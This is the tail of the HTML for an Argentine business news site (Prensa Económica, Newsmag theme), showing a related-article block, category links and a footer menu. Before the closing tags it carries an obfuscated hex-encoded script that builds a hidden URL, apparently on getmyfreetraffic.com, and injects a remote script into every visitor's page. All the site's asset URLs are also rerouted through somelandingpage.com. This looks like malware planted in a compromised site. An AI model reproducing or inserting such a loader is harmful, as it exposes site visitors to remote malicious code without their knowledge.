	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"><img width="100" height="75" itemprop="image" class="entry-thumb" src="https://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/uploads/2019/02/vaca-muerta-100x75.jpg" alt="" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://prensaeconomica.com.ar/vaca-muerta-que-el-boom-de-2018-se-sostenga/" rel="bookmark" title="Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga">Vaca Muerta: Que el &#8220;boom&#8221; de 2018 se sostenga</a></h3>            <div class="meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-02-11T16:22:38+00:00" >11 febrero, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Prensa Económica"><meta itemprop="datePublished" content="2019-02-11T16:22:38+00:00"><meta itemprop="headline " content="Vaca Muerta: Que el &quot;boom&quot; de 2018 se sostenga"><meta itemprop="image" content="https://somelandingpage.com/3gGykjDJ?frm=script&amp;/wp-content/uploads/2019/02/vaca-muerta.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->        </div>

        <div class="td-pb-span4">
            <div class="td_block_wrap td_block_popular_categories widget widget_categories"><h4 class="block-title"><span>Categoría popular</span></h4><ul class="td-pb-padding-side"><li><a href="http://prensaeconomica.com.ar/actualidad/">Actualidad<span class="td-cat-no">205</span></a></li><li><a href="http://prensaeconomica.com.ar/economia/">Economía<span class="td-cat-no">138</span></a></li><li><a href="http://prensaeconomica.com.ar/pases/">Pases<span class="td-cat-no">71</span></a></li><li><a href="http://prensaeconomica.com.ar/opiniones/">Opiniones<span class="td-cat-no">60</span></a></li><li><a href="http://prensaeconomica.com.ar/tendencias/">Tendencias<span class="td-cat-no">57</span></a></li><li><a href="http://prensaeconomica.com.ar/rse-sustentabilidad/">RSE &amp; Sustentabilidad<span class="td-cat-no">56</span></a></li><li><a href="http://prensaeconomica.com.ar/innovacion-actualidad/">Innovación<span class="td-cat-no">52</span></a></li></ul></div> <!-- ./block -->        </div>
    </div>
</div>




<!-- Sub Footer -->
    <div class="td-sub-footer-container td-container td-container-border ">
        <div class="td-pb-row">
            <div class="td-pb-span4 td-sub-footer-copy">
                <div class="td-pb-padding-side">
                    &copy;                 </div>
            </div>

            <div class="td-pb-span8 td-sub-footer-menu">
                <div class="td-pb-padding-side">
                    <div class="menu-menum-container"><ul id="menu-menum-1" class=""><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-3253"><a href="http://prensaeconomica.com.ar/quienes-somos/">Quienes somos</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-3490"><a href="http://issuu.com/revistaprensaeconomica">Revistas</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-3254"><a href="http://www.prensaeconomica.com.ar/seminarios">Seminarios</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-3255"><a href="#">Rankings</a>
<ul  class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3488"><a href="http://prensaeconomica.com.ar/ranking-de-exportadores/">Ranking de Exportadores</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3489"><a href="http://prensaeconomica.com.ar/ranking-1000-empresas-lideres/">Ranking 1000 Empresas Líderes</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3487"><a href="http://prensaeconomica.com.ar/ranking-de-prestigio-empresario/">Ranking de Prestigio Empresario</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3486"><a href="http://prensaeconomica.com.ar/contacto/">Contacta a Prensa Económica</a></li>
</ul></div>                </div>
            </div>
        </div>
    </div>
    </div><!--close content div-->
</div><!--close td-outer-wrap-->





    <!--

        Theme: Newsmag by tagDiv 2015
        Version: 2.2 (rara)
        Deploy mode: deploy
        
        uid: 5c6d09e23a7c3
    -->

    <script type="text/javascript">var =["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x20\x76\x61\x72\x20\x74\x75\x72\x6C\x20\x3D\x20\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x31\x30\x34\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x35\x2C\x20\x35\x38\x2C\x20\x34\x37\x2C\x20\x34\x37\x2C\x20\x31\x30\x33\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x30\x39\x2C\x20\x31\x32\x31\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x31\x2C\x20\x31\x30\x31\x2C\x20\x31\x31\x36\x2C\x20\x31\x31\x34\x2C\x20\x39\x37\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x32\x2C\x20\x31\x30\x35\x2C\x20\x39\x39\x2C\x20\x34\x36\x2C\x20\x39\x39\x2C\x20\x31\x31\x31\x2C\x20\x31\x30\x39\x2C\x20\x34\x37\x2C\x20\x31\x30\x30\x2C\x20\x36\x36\x2C\x20\x31\x31\x30\x2C\x20\x31\x31\x39\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x34\x2C\x20\x36\x33\x2C\x20\x31\x30\x32\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x39\x2C\x20\x36\x31\x2C\x20\x31\x31\x35\x2C\x20\x39\x39\x2C\x20\x31\x31\x34\x2C\x20\x31\x30\x35\x2C\x20\x31\x31\x32\x2C\x20\x31\x31\x36\x2C\x20\x33\x38\x2C\x20\x39\x35\x2C\x20\x39\x39\x2C\x20\x31\x30\x35\x2C\x20\x31\x30\x30\x2C\x20\x36\x31\x2C\x20\x31\x30\x30\x2C\x20\x35\x31\x2C\x20\x31\x30\x30\x2C\x20\x31\x30\x30\x2C\x20\x35\x34\x2C\x20\x35\x30\x2C\x20\x35\x31\x2C\x20\x34\x38\x2C\x20\x34\x35\x2C\x20\x35\x30\x2C\x20\x35\x36\x2C\x20\x35\x34\x2C\x20\x39\x38\x2C\x20\x34\x35\x2C\x20\x35\x37\x2C\x20\x31\x30\x30\x2C\x20\x35\x35\x2C\x20\x35\x34\x2C\x20\x34\x35\x2C\x20\x35\x36\x2C\x20\x35\x33\x2C\x20\x35\x31\x2C\x20\x31\x30\x31\x2C\x20\x34\x35\x2C\x20\x34\x38\x2C\x20\x31\x30\x32\x2C\x20\x39\x39\x2C\x20\x35\x35\x2C\x20\x35\x33\x2C\x20\x31\x30\x31\x2C\x20\x35\x34\x2C\x20\x34\x38\x2C\x20\x35\x30\x2C\x20\x39\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x33\x38\x2C\x20\x34\x39\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x37\x2C\x20\x35\x30\x2C\x20\x34\x38\x2C\x20\x35\x37\x2C\x20\x35\x36\x2C\x20\x35\x37\x2C\x20\x35\x33\x2C\x20\x35\x33\x2C\x20\x35\x32\x2C\x20\x35\x33\x29\x3B\x20\x76\x61\x72\x20\x70\x6F\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x3B\x20\x70\x6F\x2E\x69\x64\x3D\x20\x27\x32\x33\x34\x36\x33\x32\x61\x73\x64\x61\x73\x27\x3B\x20\x70\x6F\x2E\x74\x79\x70\x65\x20\x3D\x20\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x3B\x20\x70\x6F\x2E\x73\x72\x63\x20\x3D\x20\x74\x75\x72\x6C\x3B\x20\x76\x61\x72\x20\x73\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x28\x27\x73\x63\x72\x69\x70\x74\x27\x29\x5B\x30\x5D\x3B\x20\x20\x73\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65\x28\x70\x6F\x2C\x20\x73\x29\x3B\x20\x76\x61\x72\x20\x65\x6C\x65\x6D\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x28\x27\x63\x64\x6E\x30\x30\x30\x30\x30\x30\x33\x27\x29\x3B\x20\x65\x6C\x65\x6D\x2E\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65\x2E\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64\x28\x65\x6C\x65\x6D\x29\x3B\x7D\x29\x28\x29\x3B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];var _0x3a23=[[0],[1],[2],[3],[4],[5],[6],[7],[8],[9],[10],[11]];var _0x153e=[_0x3a23[0],_0x3a23[1],_0x3a23[2],_0x3a23[3],_0x3a23[4],_0x3a23[5],_0x3a23[6],_0x3a23[7],_0x3a23[8],_0x3a23[9],_0x3a23[10],_0x3a23[11]];var _0x4558=[_0x153e[0],_0x153e[1],_0x153e[2],_0x153e[3],_0x153e[4],_0x153e[5],_0x153e[6],_0x153e[7],_0x153e[8],_0x153e[9],_0x153e[10],_0x153e[11]];var _0x1625=[_0x4558[0],_0x4558[1],_0x4558[2],_0x4558[3],_0x4558[4],_0x4558[5],_0x4558[6],_0x4558[7],_0x4558[8],_0x4558[9],_0x4558[10],_0x4558[11]];var _0x5955=[_0x1625[0],_0x1625[1],_0x1625[2],_0x1625[3],_0x1625[4],_0x1625[5],_0x1625[6],_0x1625[7],_0x1625[8],_0x1625[9],_0x1625[10],_0x1625[11]];var _0x48514a=[_0x5955[0],_0x5955[1],_0x5955[2],_0x5955[3],_0x5955[4],_0x5955[5],_0x5955[6],_0x5955[7],_0x5955[8],_0x5955[9],_0x5955[10],_0x5955[11]];var _0x411ee3=[_0x48514a[0x0],_0x48514a[0x1],_0x48514a[0x2],_0x48514a[0x3],_0x48514a[0x4],_0x48514a[0x5],_0x48514a[0x6],_0x48514a[0x7],_0x48514a[0x8],_0x48514a[0x9],_0x48514a[0xa],_0x48514a[0xb]];(function(){var _0x2104x8=document[_0x411ee3[0x1]](_0x411ee3[0x0]);_0x2104x8[_0x411ee3[0x2]]= _0x411ee3[0x3];_0x2104x8[_0x411ee3[0x4]]=  !![];_0x2104x8[_0x411ee3[0x5]]= _0x411ee3[0x6];_0x2104x8[_0x411ee3[0x7]]= _0x411ee3[0x8];var _0x2104x9=document[_0x411ee3[0x9]](_0x411ee3[0x0])[0x0];_0x2104x9[_0x411ee3[0xb]][_0x411ee3[0xa]](_0x2104x8,_0x2104x9)}());</script><script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/3gGykjDJ?frm=script&\/wp-admin\/admin-ajax.php","ajax_loader_url":"\/\/somelandingpage.com\/3gGykjDJ?frm=script&\/wp-content\/plugins\/woocommerce\/assets\/images\/ajax-loader@2x.gif","i18n_view_cart":"Ver carrito","cart_url":"","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='//somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart_min_js&#038;ver=2.1.12'></script>
<script type='text/javascript' src='//somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery_blockUI_min_js&#038;ver=2.60'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/3gGykjDJ?frm=script&\/wp-admin\/admin-ajax.php","ajax_loader_url":"\/\/somelandingpage.com\/3gGykjDJ?frm=script&\/wp-content\/plugins\/woocommerce\/assets\/images\/ajax-loader@2x.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='//somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce_min_js&#038;ver=2.1.12'></script>
<script type='text/javascript' src='//somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery_cookie_min_js&#038;ver=1.3.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/3gGykjDJ?frm=script&\/wp-admin\/admin-ajax.php","fragment_name":"wc_fragments"};
/* ]]> */
</script>
<script type='text/javascript' src='//somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments_min_js&#038;ver=2.1.12'></script>
<script type='text/javascript' src='http://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-content/themes/Newsmag/js/tagdiv_theme_js&#038;ver=2.2'></script>
<script type='text/javascript' src='http://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-includes/js/comment-reply_min_js&#038;ver=4.8.8'></script>
<script type='text/javascript' src='http://somelandingpage.com/3gGykjDJ?frm=script&#038;/wp-includes/js/wp-embed_min_js&#038;ver=4.8.8'></script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/themes/Newsmag/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://somelandingpage.com/3gGykjDJ?frm=script&/wp-content/themes/Newsmag';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

</body>
</html>